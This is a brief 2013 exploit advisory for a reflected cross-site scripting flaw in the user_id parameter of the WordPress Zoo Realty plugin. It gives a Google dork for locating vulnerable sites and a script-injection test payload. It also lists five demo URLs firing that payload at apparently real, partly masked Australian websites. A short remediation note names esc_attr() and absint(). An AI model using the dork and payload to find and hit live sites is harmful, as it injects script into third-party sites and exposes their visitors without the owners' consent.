#############################
# Exploit Title : WordPress Zoo Realty Plugin Cross-Site Scripting (XSS) Vulnerability
#
# Author : Ashiyane Digital Security Team
#
# Date: 2013/10/05
#
# Vendor Homepage : http://wordpress.org
#
# Google Dork : inurl:wp-content/plugins/Realty/display/elements/form_contact_agent.php
#
##############
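# Location : site//wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=[xss]&popup=1
#
# Method : GET
#
# Issue : the user_id query parameter appears to be reflected in the response without output encoding (reflected XSS).
#
# Test string : "/><script>alert(1);</script>
#
# Note : the leading "/> in the test string suggests the value lands inside an HTML attribute. The fix is to escape
#        user_id on output (esc_attr() in WordPress) or, if it is meant to be a numeric ID, to cast it with absint() before use.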
##############
# Demo:
#
# http://www.absXde.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1
#
# http://www.aXm.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1
#
# http://www.homeXnds.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1
#
# http://www.newsXciesforsale.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1
#
# http://www.planXoperties.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1
#
###########################
#
# Discovered By : ACC3SS
#
###########################